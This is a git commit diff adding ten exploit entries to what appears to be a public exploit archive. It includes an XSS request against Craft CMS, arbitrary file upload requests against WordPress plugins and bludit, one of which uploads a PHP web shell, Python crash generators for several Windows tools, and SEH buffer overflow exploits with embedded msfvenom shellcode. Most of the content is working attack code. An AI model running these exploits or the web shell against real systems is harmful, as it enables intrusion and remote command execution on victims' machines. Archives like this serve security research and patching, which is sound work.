DB: 2018-12-28

10 changes to exploits/shellcodes Product Key Explorer 4.0.9 - Denial of Service (PoC) NetShareWatcher 1.5.8 - Denial of Service (PoC) ShareAlarmPro 2.1.4 - Denial of Service (PoC) MAGIX Music Editor 3.1 - Buffer Overflow (SEH) Terminal Services Manager 3.1 - Local Buffer Overflow (SEH) Iperius Backup 5.8.1 - Buffer Overflow (SEH) Craft CMS 3.0.25 - Cross-Site Scripting WordPress Plugin Audio Record 1.0 - Arbitrary File Upload bludit Pages Editor 3.0.0 - Arbitrary File Upload WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
2018-12-28 05:01:43 +00:00 · 2018-12-28 05:01:43 +00:00 · a6aa1db161
commit a6aa1db161
parent 1b31850a46
11 changed files with 483 additions and 0 deletions
--- a/exploits/php/webapps/46054.txt
+++ b/exploits/php/webapps/46054.txt
@ -0,0 +1,39 @@
+# Exploit Title: Craft CMS 3.0.25 - Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2018-12-20
+# Exploit Author: Raif Berkay Dincel
+# Contact: www.raifberkaydincel.com
+# More Details [1] : https://www.raifberkaydincel.com/craft-cms-3-0-25-cross-site-scripting-vulnerability.html
+# More Details [2] : https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/blob/master/README.md
+# Vendor Homepage: craftcms.com 
+# Vulnerable Software --> [ https://github.com/rdincel1/Craft-CMS-3.0.25---Cross-Site-Scripting/raw/master/Craft-3.0.25.rar ] 
+# Affected Version: [ 3.0.25 ]
+# CVE-ID: CVE-2018-20418
+# Tested on: Kali Linux / Linux Mint / Windows 10
+ 
+# Vulnerable Parameter Type: POST 
+# Vulnerable Parameter: http://127.0.0.1/admin-panel-path/index.php?p=admin/actions/entries/save-entry
+# Attack Pattern: <script>alert("Raif_Berkay")</script> 
+ 
+# Description
+ 
+Allows it to run a Cross-Site Scripting by saving a new title from the console tab.
+ 
+# Proof of Concepts:
+ 
+POST /admin-panel-path/index.php?p=admin/actions/entries/save-entry HTTP/1.1
+Host: IP:PORT
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Registered-Asset-Bundles: ,craft\web\assets\quickpost\QuickPostAsset,craft\web\assets\cp\CpAsset,craft\web\assets\d3\D3Asset,craft\web\assets\elementresizedetector\ElementResizeDetectorAsset,craft\web\assets\garnish\GarnishAsset,yii\web\JqueryAsset,craft\web\assets\jquerytouchevents\JqueryTouchEventsAsset,craft\web\assets\velocity\VelocityAsset,craft\web\assets\jqueryui\JqueryUiAsset,craft\web\assets\jquerypayment\JqueryPaymentAsset,craft\web\assets\datepickeri18n\DatepickerI18nAsset,craft\web\assets\picturefill\PicturefillAsset,craft\web\assets\selectize\SelectizeAsset,craft\web\assets\fileupload\FileUploadAsset,craft\web\assets\xregexp\XregexpAsset,craft\web\assets\fabric\FabricAsset,craft\web\assets\prismjs\PrismJsAsset,craft\redactor\assets\field\FieldAsset,craft\redactor\assets\redactor\RedactorAsset,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,craft\web\assets\matrix\MatrixAsset,craft\web\assets\recententries\RecentEntriesAsset,craft\web\assets\feed\FeedAsset,craft\web\assets\dashboard\DashboardAsset
+X-Registered-Js-Files: ,IP:PORT/admin-panel-path/cpresources/210842f9/d3.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/8c97f5da/element-resize-detector.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/a3075e2f/jquery.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/28095e6a/jquery.mobile-events.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/b288a952/velocity.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/12b5557f/garnish.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/fc2132f7/jquery-ui.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/aeaf06ba/jquery.payment.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/6270e830/datepicker-tr.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/2fad62a8/picturefill.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7bd34f2c/selectize.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/37456356/jquery.fileupload.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/71bf0ba6/xregexp-all.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7f38141/fabric.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/7dfc6a65/js/Craft.min.js?v=1545257354,IP:PORT/admin-panel-path/cpresources/92be564/QuickPostWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/2a8f54e3/prism.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/redactor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/d443ac9b/lang/tr.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/PluginBase.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImageEditor.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetImages.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftAssetFiles.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/CraftEntryLinks.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/a919311b/js/RedactorOverrides.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/699311eb/fullscreen.js,IP:PORT/admin-panel-path/cpresources/5ec6eb0d/video.js,IP:PORT/admin-panel-path/cpresources/2fd586d6/MatrixInput.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/5938f19a/RecentEntriesWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/ff3b78b9/FeedWidget.min.js?v=1545257412,IP:PORT/admin-panel-path/cpresources/86785e72/Dashboard.min.js?v=1545257412
+X-CSRF-Token: 3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo=
+Content-Length: 857
+Connection: close
+Cookie: _ga=GA1.2.143638489.1545256652; _gid=GA1.2.362987822.1545256652; 1031b8c41dfff97a311a7ac99863bdc5_identity=3fe8168bce4c48f844d43d3855ef833d47ba56edc78686d732690216a40a7ee6a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A243%3A%22%5B%221%22%2C%22%5B%5C%226wiT39UWdaEONl4iVMf6YZKo0TXsitqlapyaB4s1w9PJxkC3lUIyQsTP12pW0NLCU03hRa_X8SAglzpjlTUJh47RcOcmjgBQE9uO%5C%22%2C%5C%2212a6fb6b-eb72-44c3-b890-6c71b8d2bb88%5C%22%2C%5C%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%3B+rv%3A64.0%29+Gecko%2F20100101+Firefox%2F64.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_username=2365234bf6c8d0bafa98169137b93dc9e6af973d5135b3f0dd94d23d71c923d2a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; CraftSessionId=asetaditigin2tb5uerlivl8h7; CRAFT_CSRF_TOKEN=f4c4ded0838271c4ba50e1e2953119ff3b266d2cedaeba1984823672a14f6e71a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7Ca6cfc948987f6fa5745a965899bdadc6ed38ce0c9b259fcaaa124e258d3f0f97UpMNICaFkYV9aBp0gRMIdb67eo4FAjxx6iAYJIMM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; _gat=1
+Cache-Control: no-transform
+ 
+enabled=1&fieldsLocation=fields1428173416&CRAFT_CSRF_TOKEN=3DfArizwnHjDchbSztLrD2y9nzm5ZkSF2zukx2PZ3i6suVVTRScwwqtvPKqGXYiVZW1POc8cGtXlnjRfrfplCa1kg6nfVMOwm6fPN3BvkYrtM5QsDEV3dYhbSN1lBW6wFSNfiReM9Q3nAb9ut55USDtdUvokmt1DCs4AOm9Y0Ue1Gx1cmGd1Rzy0v3qTP3MsTi9z4tNJEVFdFMBCFtcEgKxH00WYzD8GdZk2aDlHVJHrMHOLTYzf1SzY2dJlO9ifBT0ZJcJNkvQk83bcygPe64lHjeBls_0-qCtA66-Qmz8L79Jw3QRysr5UkIEis6ZWmtAUCg9ufY_XDgrJ4D6xoV1Udw6pKny00KkAaszDUzyVXbrLuzWn063CqwRIDPS6jgr2Hjl8ERbpOinsVzELgiAbO7pxvJM00FTPI_nXFyl9NgusHfufMzqpUncmPLNxgn5yaN4mHz9EgtY7ynU6YQNTQp73e3B1bCfkd3zvZtP-KJgUwqVPbAHQUV5_HwPDxVs02R-_irNvlPeDAHaR6zdETXeKfLycZ70-kJtIqpo%3D&title=%3Cscript%3Ealert("Raif_XSS")%3C%2Fscript%3E&fields1428173416%5BfeaturedImage%5D=&fields1428173416%5BshortDescription%5D=&fields1428173416%5Bheading%5D=&fields1428173416%5Bsubheading%5D=&fields1428173416%5BarticleBody%5D=&sectionId=2&typeId=2
--- a/exploits/php/webapps/46055.txt
+++ b/exploits/php/webapps/46055.txt
@ -0,0 +1,57 @@
+# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
+# Date: 2018-12-24
+# Software Link: https://wordpress.org/plugins/audio-record/
+# Exploit Author: Kaimi
+# Website: https://kaimi.io
+# Version: 1.0
+# Category: webapps
+
+# Unrestricted file upload in record upload process allowing arbitrary extension.
+# File: recorder.php
+# Vulnerable code:
+function save_record_callback() {
+
+        foreach(array('audio') as $type) {
+            if (isset($_FILES["${type}-blob"])) {
+
+                $fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
+                $path_array  = wp_upload_dir();
+                $path = str_replace('\\', '/', $path_array['path']);
+                $uploadDirectory = $path . "/$fileName";
+                if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
+                        echo 000;
+                    wp_die("problem moving uploaded file");
+                }
+
+
+# Exploitation example:
+
+POST /wp-admin/admin-ajax.php HTTP/1.1
+Host: example.com
+Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
+...
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="audio-filename"
+
+file.php
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="audio-blob"; filename="blob"
+Content-Type: audio/wav
+
+<?php phpinfo();
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="action"
+
+save_record
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="course_id"
+
+undefined
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="unit_id"
+
+undefined
+-----------------------------18311719029180117571501079851--
+
+# Uploaded file will be located at standard WordPress media upload directory (for ex: /wp-content/uploads/year/month/).
+# If directory listing is disabled - file name can be guessed due to cryptographically insecure nature of uniqid() call.
--- a/exploits/php/webapps/46060.txt
+++ b/exploits/php/webapps/46060.txt
@ -0,0 +1,34 @@
+# Exploit Title: bludit Pages Editor 3.0.0 - Arbitrary File Upload 
+# Date: 2018-10-02
+# Google Dork: N/A
+# Exploit Author: BouSalman
+# Vendor Homepage: https://www.bludit.com/
+# Software Link: N/A
+# Version: 3.0.0
+# Tested on: Ubuntu 18.04
+# CVE : 2018-1000811
+
+POST /admin/ajax/upload-files HTTP/1.1
+Host: 192.168.140.154
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.140.154/admin/new-content
+X-Requested-With: XMLHttpRequest
+Content-Length: 415
+Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
+Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
+Connection: close
+
+-----------------------------26228568510541774541866388118
+Content-Disposition: form-data; name="tokenCSRF"
+
+67987ea926223b28949695d6936191d28d320f20
+-----------------------------26228568510541774541866388118
+Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
+Content-Type: image/png
+
+<?php system($_GET["cmd"]);?>
+
+-----------------------------26228568510541774541866388118--
--- a/exploits/php/webapps/46061.txt
+++ b/exploits/php/webapps/46061.txt
@ -0,0 +1,40 @@
+# Exploit Title: WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
+# Date: 2018-12-24
+# Software Link: https://wordpress.org/plugins/baggage-freight/
+# Exploit Author: Kaimi
+# Website: https://kaimi.io
+# Version: 0.1.0
+# Category: webapps
+
+# Unrestricted file upload for unahtorized user in package info upload 
+# process allowing arbitrary extension.
+
+File: upload-package.php
+
+Vulnerable code:
+if($_POST["submit"])
+{
+    if ($_FILES["file"])
+    {
+        $uploadpath = "../wp-content/plugins/baggage_shipping/upload/".time()."_".$_FILES["file"]["name"];
+
+        move_uploaded_file($_FILES["file"]["tmp_name"],$uploadpath);
+
+# Exploitation example:
+
+POST /wp-content/plugins/baggage-freight/upload-package.php HTTP/1.1
+Host: example.com
+Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
+...
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="submit"
+
+1
+-----------------------------18311719029180117571501079851
+Content-Disposition: form-data; name="file"; filename="file.php"
+Content-Type: audio/wav
+
+<?php phpinfo();
+-----------------------------18311719029180117571501079851--
+
+# Uploaded file will be located at /wp-content/plugins/baggage_shipping/upload/{timestamp}_info.php.
--- a/exploits/windows_x86/dos/46057.py
+++ b/exploits/windows_x86/dos/46057.py
@ -0,0 +1,46 @@
+# Exploit Title: Product Key Explorer 4.0.9 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version:  Product Key Explorer 4.0.9
+# Tested on: Windows 7 SP1 x86
+
+# Other affected software from the vendor
+# Software: http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
+# Software: http://www.nsauditor.com/downloads/apkf_setup.exe
+# Software: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
+# Software: http://spotauditor.nsauditor.com/downloads/spotauditor_setup.exe
+# Software: http://www.nsauditor.com/downloads/spotmsn_setup.exe
+# Software: http://www.nsauditor.com/downloads/spotie_setup.exe
+# Software: http://www.nsauditor.com/downloads/spotftp_setup.exe
+# Software: http://www.network-inventory-software.com/downloads/nhsi_setup.exe
+# Software: http://www.nsauditor.com/downloads/nsi_setup.exe
+# Software: http://www.nsauditor.com/downloads/blueauditor_setup.exe
+# Software: http://www.nsauditor.com/downloads/networksleuth_setup.exe
+# Software: http://www.nsauditor.com/downloads/remshutdown_setup.exe
+# Software: http://www.nsauditor.com/downloads/dnss_setup.exe
+
+# PoC:
+# 1.  Download and install the setup file
+# 2.  A file "PoC.txt" will be created
+# 3.  Click Help > Register... in tool bar
+# 4.  Copy the contents of the file (PoC.txt) and paste in the Registration Key/Name field 
+# 5.  Click OK and BOOMMMM !!!! 
+
+#!/usr/bin/python
+
+buffer = "\x41" * 2000
+buffer += "\x42" * 2000
+buffer += "\x43" * 1000
+
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/exploits/windows_x86/dos/46062.py
+++ b/exploits/windows_x86/dos/46062.py
@ -0,0 +1,31 @@
+# Exploit Title: NetShareWatcher 1.5.8 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version: NetShareWatcher 1.5.8
+# Tested on: Windows 7 SP1 x86
+# Other software from the vendor affected 
+# Software: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
+
+# PoC:
+# 1.  Download and install the setup file
+# 2.  A file "PoC.txt" will be created
+# 3.  Click Help > Register... in tool bar
+# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
+# 5.  Click OK and BOOMMMM !!!! 
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5256
+
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/exploits/windows_x86/dos/46063.py
+++ b/exploits/windows_x86/dos/46063.py
@ -0,0 +1,29 @@
+# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC)
+# Date: 2018-12-25
+# Exploit Author: T3jv1l
+# Vendor Homepage: :http://www.nsauditor.com
+# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe
+# Contact: https://twitter.com/T3jv1l
+# Version:ShareAlarmPro 2.1.4
+# Tested on: Windows 7 SP1 x86
+
+# PoC:
+# 1.  Download and install the setup file
+# 2.  A file "PoC.txt" will be created
+# 3.  Click Help > Register... in tool bar
+# 4.  Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field 
+# 5.  Click OK and BOOMMMM !!!! 
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5000
+
+payload = buffer
+try:
+    f=open("PoC.txt","w")
+    print "[+] Creating %s bytes payload..." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
--- a/exploits/windows_x86/local/46056.py
+++ b/exploits/windows_x86/local/46056.py
@ -0,0 +1,72 @@
+# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Date: 2018-12-24
+# Vulnerable Software: MAGIX Music Editor 3.1
+# Vendor Homepage: https://www.magix.com/us/
+# Version: 3.1
+# Software Link: https://www.magix.com/us/music/mp3-deluxe/
+# Music Editor Software is bundled with MP3 Deluxe 19
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. open music editor 3
+# 3. go to CD > freedb options > FreeDB Proxy Options
+# 4. copy/paste magix.txt contents into Server field
+# 5. select Accept settings
+# 6. pop calc
+
+#!/usr/bin/python
+
+filename="magix.txt"
+
+#lol
+junk = "A"*420
+
+#jump 6
+nseh = "\xeb\x06\xcc\xcc"
+
+#0x10015b08 : pop ecx # pop ecx # ret  | ascii {PAGE_EXECUTE_READ} [dac3x.dll]
+seh = "\x08\x5b\x01\x10"
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00" -e x86/alpha_mixed -f c
+#Payload size: 447 bytes
+calc = ("\xda\xd4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
+"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
+"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
+"\x4c\x4b\x58\x4b\x32\x67\x70\x55\x50\x45\x50\x45\x30\x6e\x69"
+"\x6b\x55\x54\x71\x49\x50\x65\x34\x6c\x4b\x72\x70\x70\x30\x6e"
+"\x6b\x76\x32\x46\x6c\x6c\x4b\x43\x62\x65\x44\x4e\x6b\x50\x72"
+"\x64\x68\x66\x6f\x58\x37\x52\x6a\x31\x36\x45\x61\x4b\x4f\x6e"
+"\x4c\x67\x4c\x43\x51\x61\x6c\x75\x52\x34\x6c\x51\x30\x6b\x71"
+"\x7a\x6f\x56\x6d\x45\x51\x78\x47\x7a\x42\x4c\x32\x56\x32\x56"
+"\x37\x6e\x6b\x32\x72\x42\x30\x4e\x6b\x32\x6a\x37\x4c\x6c\x4b"
+"\x72\x6c\x67\x61\x61\x68\x4a\x43\x30\x48\x73\x31\x6b\x61\x66"
+"\x31\x6e\x6b\x43\x69\x57\x50\x46\x61\x5a\x73\x4c\x4b\x51\x59"
+"\x42\x38\x4d\x33\x37\x4a\x30\x49\x6e\x6b\x46\x54\x6c\x4b\x76"
+"\x61\x68\x56\x65\x61\x4b\x4f\x4c\x6c\x5a\x61\x78\x4f\x56\x6d"
+"\x56\x61\x58\x47\x65\x68\x4b\x50\x53\x45\x48\x76\x37\x73\x71"
+"\x6d\x78\x78\x55\x6b\x31\x6d\x44\x64\x64\x35\x59\x74\x72\x78"
+"\x4c\x4b\x31\x48\x66\x44\x36\x61\x6a\x73\x70\x66\x6e\x6b\x74"
+"\x4c\x42\x6b\x6e\x6b\x46\x38\x57\x6c\x36\x61\x38\x53\x6c\x4b"
+"\x64\x44\x6c\x4b\x46\x61\x5a\x70\x6d\x59\x32\x64\x61\x34\x46"
+"\x44\x53\x6b\x61\x4b\x63\x51\x36\x39\x31\x4a\x52\x71\x69\x6f"
+"\x4b\x50\x71\x4f\x61\x4f\x70\x5a\x6e\x6b\x66\x72\x78\x6b\x6c"
+"\x4d\x31\x4d\x31\x7a\x43\x31\x4e\x6d\x4b\x35\x68\x32\x47\x70"
+"\x65\x50\x65\x50\x36\x30\x62\x48\x54\x71\x4c\x4b\x42\x4f\x4f"
+"\x77\x59\x6f\x4e\x35\x4d\x6b\x68\x70\x68\x35\x4d\x72\x52\x76"
+"\x30\x68\x4e\x46\x5a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4a\x75\x35"
+"\x6c\x46\x66\x73\x4c\x75\x5a\x4d\x50\x69\x6b\x79\x70\x51\x65"
+"\x76\x65\x6f\x4b\x33\x77\x74\x53\x31\x62\x70\x6f\x73\x5a\x33"
+"\x30\x76\x33\x39\x6f\x58\x55\x30\x63\x75\x31\x52\x4c\x73\x53"
+"\x36\x4e\x52\x45\x53\x48\x32\x45\x65\x50\x41\x41")
+
+fill = "C"*2000
+
+buffer = junk + nseh + seh + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
--- a/exploits/windows_x86/local/46058.py
+++ b/exploits/windows_x86/local/46058.py
@ -0,0 +1,61 @@
+# Exploit Title: Terminal Services Manager 3.1 - Buffer Overflow (SEH)
+# Date: 2018-12-25
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Vulnerable Software: Terminal Services Manager 3.1
+# Vendor Homepage: https://lizardsystems.com
+# Version: 3.1 
+# Software Link: https://lizardsystems.com/download/tsmanager_setup.exe
+# Tested Windows 7 SP1 x86
+
+# Other affected software from the vendor
+# Software Link: https://lizardsystems.com/download/rpexplorer_setup.exe
+# Software Link: https://lizardsystems.com/download/rshutdown_setup.exe
+# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
+
+# PoC
+# 1. run script
+# 2. run add computers wizard
+# 3. select import from files
+# 4. paste tsmang.txt into computer names field
+# 5. pop calc
+
+#bad chars \x00\x0d\x0e
+
+#!/usr/bin/python
+
+import struct
+
+junk2 = "A"*100
+junk1 = "B"*74
+jmp2 = "\xe9\x71\xfe\xff\xff\xcc"
+jmp1 = "\xeb\xf8\xcc\xcc"
+
+#0x0049709f : pop esi # pop ebx # ret  tsmanager.exe
+seh = struct.pack('<L',0x0049709f)
+
+#Payload size: 220 bytes
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0d\x0e" -f python
+calc =  ""
+calc += "\xdb\xcd\xd9\x74\x24\xf4\x5a\x2b\xc9\xbe\xbb\x1e\xdd"
+calc += "\x8e\xb1\x31\x31\x72\x18\x83\xc2\x04\x03\x72\xaf\xfc"
+calc += "\x28\x72\x27\x82\xd3\x8b\xb7\xe3\x5a\x6e\x86\x23\x38"
+calc += "\xfa\xb8\x93\x4a\xae\x34\x5f\x1e\x5b\xcf\x2d\xb7\x6c"
+calc += "\x78\x9b\xe1\x43\x79\xb0\xd2\xc2\xf9\xcb\x06\x25\xc0"
+calc += "\x03\x5b\x24\x05\x79\x96\x74\xde\xf5\x05\x69\x6b\x43"
+calc += "\x96\x02\x27\x45\x9e\xf7\xff\x64\x8f\xa9\x74\x3f\x0f"
+calc += "\x4b\x59\x4b\x06\x53\xbe\x76\xd0\xe8\x74\x0c\xe3\x38"
+calc += "\x45\xed\x48\x05\x6a\x1c\x90\x41\x4c\xff\xe7\xbb\xaf"
+calc += "\x82\xff\x7f\xd2\x58\x75\x64\x74\x2a\x2d\x40\x85\xff"
+calc += "\xa8\x03\x89\xb4\xbf\x4c\x8d\x4b\x13\xe7\xa9\xc0\x92"
+calc += "\x28\x38\x92\xb0\xec\x61\x40\xd8\xb5\xcf\x27\xe5\xa6"
+calc += "\xb0\x98\x43\xac\x5c\xcc\xf9\xef\x0a\x13\x8f\x95\x78"
+calc += "\x13\x8f\x95\x2c\x7c\xbe\x1e\xa3\xfb\x3f\xf5\x80\xf4"
+calc += "\x75\x54\xa0\x9c\xd3\x0c\xf1\xc0\xe3\xfa\x35\xfd\x67"
+calc += "\x0f\xc5\xfa\x78\x7a\xc0\x47\x3f\x96\xb8\xd8\xaa\x98"
+calc += "\x6f\xd8\xfe\xfa\xee\x4a\x62\xd3\x95\xea\x01\x2b"
+
+buffer = junk2 + calc + junk1 + jmp2 + jmp1 + seh
+
+with open("tsmang.txt","wb") as f:
+    f.write(buffer[:-1])
--- a/exploits/windows_x86/local/46059.py
+++ b/exploits/windows_x86/local/46059.py
@ -0,0 +1,64 @@
+# Exploit Title: Iperius Backup 5.8.1 - Buffer Overflow (SEH)
+# Date: 2018-12-26
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Vulnerable Software: Iperius Backup 5.8.1
+# Vendor Homepage: https://www.iperiusbackup.com
+# Version: 5.8.1 Local Buffer Overflow (SEH Unicode)
+# Software Link: https://www.iperiusbackup.com/download.aspx?v=free
+# Tested Windows 7 SP1 x86
+
+# PoC
+# 1. run script
+# 2. open app and create backup job
+# 3. on other processes tab, select 'run a program or open external file'
+# 4. copy/paste iperius.txt contents into file location
+# 5. select ok to complete creating backup job
+# 6. run backup job
+# 7. app crashes; pop calc
+
+#!/usr/bin/python
+
+filename="iperius.txt"
+
+junk = "\x71" * 306
+
+#popad
+nseh = "\x61\x62"
+
+#0x005b004a
+#pop esi # pop ebx # ret  | startnull,unicode,asciiprint,ascii Iperius.exe
+seh = "\x4a\x5b"
+
+valign = (
+"\x53" 					#push ebx
+"\x47" 					#align
+"\x58" 					#pop eax
+"\x47" 					#align
+"\x05\x12\x01" 	                        #add eax,200 
+"\x47"					#align
+"\x2d\x11\x01"	                        #sub eax,100
+"\x47"					#align
+"\x50"					#push eax
+"\x47"					#align
+"\xc3"					#retn
+)
+
+#509 bytes
+#msfvenom -p windows/exec CMD=calc -e x86/unicode_upper BufferRegister=EAX
+calc = (
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AI"
+"AJQI1AYAZBABABABAB30APB944JBKLZH4BM0M0KPS0SYIUP1Y01TTKR0NP4K1BLLDK0RN4DK42O8LOH70JMV01KO6LOL31SLKRNLO0"
+"7QHOLMM17WK2L21B1GDKQBN04KOZOLDKPLN148ZC18KQJ121TKB9O0KQ9C4K0IN8ZCOJQ9TK04TKM1YF01KOVL7QXOLMM1GWNXK045"
+"ZVLC3ML8OK3MO43EZDQHTKR8O4M1XS2FDKLLPK4KB8MLKQJ3TKKTTKM1XPCYOTMTO41K1K310YPZ21KOIPQOQOPZDKN2ZKDMQM1ZM1"
+"TMU582KPKPKP201XNQ4KRODGKOXU7KZP7EVB26BH76TUGMUMKOXUOLLFCLKZSPKK9PD5KU7K0GN33BBO1ZM01CKOXUQS1QBL33M0AA")
+
+nops = "\x71"*109
+
+fill = "\x71"*1000
+
+buffer = junk + nseh + seh + valign + nops + calc + fill
+  
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
